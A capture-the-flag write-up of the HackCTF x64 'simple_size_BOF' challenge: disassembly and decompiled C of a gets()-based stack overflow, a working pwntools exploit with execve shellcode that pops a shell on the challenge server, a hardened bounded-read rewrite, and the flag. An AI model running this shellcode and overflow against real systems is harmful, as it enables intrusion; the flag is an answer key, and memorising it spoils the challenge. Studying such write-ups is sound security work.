
[HackCTF] x64 simple_size_BOF

d2n0s4ur 2021. 8. 8. 14:29

Disassembly of main:

Dump of assembler code for function main:
   0x0000000000400636 <+0>:     push   rbp
   0x0000000000400637 <+1>:     mov    rbp,rsp
   0x000000000040063a <+4>:     sub    rsp,0x6d30
   0x0000000000400641 <+11>:    mov    rax,QWORD PTR [rip+0x200a08]        # 0x601050 <stdout@@GLIBC_2.2.5>
   0x0000000000400648 <+18>:    mov    ecx,0x0
   0x000000000040064d <+23>:    mov    edx,0x2
   0x0000000000400652 <+28>:    mov    esi,0x0
   0x0000000000400657 <+33>:    mov    rdi,rax
   0x000000000040065a <+36>:    call   0x400520 <setvbuf@plt>
   0x000000000040065f <+41>:    mov    edi,0x400728
   0x0000000000400664 <+46>:    call   0x4004e0 <puts@plt>
   0x0000000000400669 <+51>:    lea    rax,[rbp-0x6d30]
   0x0000000000400670 <+58>:    mov    rsi,rax
   0x0000000000400673 <+61>:    mov    edi,0x40074e
   0x0000000000400678 <+66>:    mov    eax,0x0
   0x000000000040067d <+71>:    call   0x4004f0 <printf@plt>
   0x0000000000400682 <+76>:    lea    rax,[rbp-0x6d30]
   0x0000000000400689 <+83>:    mov    rdi,rax
   0x000000000040068c <+86>:    mov    eax,0x0
   0x0000000000400691 <+91>:    call   0x400510 <gets@plt>
   0x0000000000400696 <+96>:    mov    eax,0x0
   0x000000000040069b <+101>:   leave
   0x000000000040069c <+102>:   ret
End of assembler dump.

Decompiling it with Hex-Rays gives

#include <stdio.h>

int main()
{
    char s[0x6D30];                 /* 0x6D30-byte stack buffer (matches sub rsp,0x6d30) */

    setvbuf(stdout, 0, 2, 0);       /* mode 2 == _IONBF: unbuffered stdout */

    puts("삐빅- 자살방지 문제입니다.");   /* roughly: "Beep - this is a freebie problem." */
    printf("buf: %p\n", s);         /* leaks the address of s */
    gets(s);                        /* unbounded read into s */

    return 0;
}

As in the earlier challenges, the overflow happens in gets.

Since the program prints the address of s beforehand, it should be enough to place shellcode in buf and then overflow into the return address.

from pwn import *

# p = process('./Simple_size_bof')
p = remote("ctf.j0n9hyun.xyz", 3005)

# parse the leaked buffer address printed as "buf: 0x..."
p.recvuntil(b"buf: ")
a = p.recvline()[:-1]
a = int(a, 16)
print(hex(a))

payload = b''
payload += b'\x90' * 0x30                                  # NOP sled at the start of the buffer
payload += b'\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'  # 31-byte execve("/bin//sh") shellcode
payload += b'\x90' * (0x6d30 - 0x30 - 31)                   # fill the rest of the 0x6d30-byte buffer
payload += b'A' * 8                                        # saved rbp
payload += p64(a)                                          # return address -> leaked buffer (lands in the NOP sled)

p.sendline(payload)

p.interactive()

We can confirm that a shell is popped successfully.
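The overflow works because gets() reads with no bound, the binary leaks the buffer address, and the stack is executable. The fix is to bound the read. Below is an added example (not the challenge's own code) of the same program with gets() replaced by a bounded reader that NUL-terminates, drains an over-long line instead of letting it spill past the buffer, and reports truncation so the caller can reject the input. The names read_line_bounded, run, demo_oversized and demo_fits are mine; demo_* feed constructed input through fmemopen (POSIX) so the behaviour can be checked without a terminal.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

#define BUF_SIZE 0x6D30   /* same buffer size as the challenge binary */

/* Bounded replacement for gets(): reads at most n-1 bytes into buf, always
   NUL-terminates, strips the trailing newline, and returns true only if the
   whole line fit. If the line was longer, the rest is consumed and discarded
   so it cannot bleed into the next read, and false is returned. */
bool read_line_bounded(char *buf, size_t n, FILE *in)
{
    if (n == 0 || fgets(buf, (int)n, in) == NULL) {
        if (n) buf[0] = '\0';
        return false;                       /* nothing read */
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return true;                        /* line fit, newline included */
    }
    if (feof(in))
        return true;                        /* final line without newline fit */
    int c;                                  /* line too long: drain the remainder */
    while ((c = fgetc(in)) != EOF && c != '\n') { }
    return false;
}

/* Hardened version of the challenge's main: same I/O shape, but no gets()
   and no address leak. Takes the input stream as a parameter for testing. */
int run(FILE *in)
{
    char s[BUF_SIZE];
    setvbuf(stdout, 0, _IONBF, 0);
    puts("bounded version");
    if (!read_line_bounded(s, sizeof s, in)) {
        puts("input too long or empty; rejected");
        return 1;
    }
    printf("read %zu bytes\n", strlen(s));
    return 0;
}

/* Constructed input longer than the buffer (like the exploit payload above).
   Returns run()'s exit code: 1 means the over-long line was rejected. */
int demo_oversized(void)
{
    static char big[BUF_SIZE + 0x40];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\n';
    FILE *f = fmemopen(big, sizeof big, "r");
    int rc = run(f);
    fclose(f);
    return rc;
}

/* Constructed short input. Returns 0: the line fit and was accepted. */
int demo_fits(void)
{
    char line[] = "hello\n";
    FILE *f = fmemopen(line, sizeof line - 1, "r");
    int rc = run(f);
    fclose(f);
    return rc;
}

int main(void)
{
    return run(stdin);
}
```

Compiling the challenge with stack protector and a non-executable stack would also have stopped this particular payload (the saved return address is overwritten, and the shellcode runs from the stack), but neither replaces the bounded read: the unbounded gets() is the bug.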

FLAG : HackCTF{s000000_5m4ll_4nd_5m4ll_51z3_b0f}
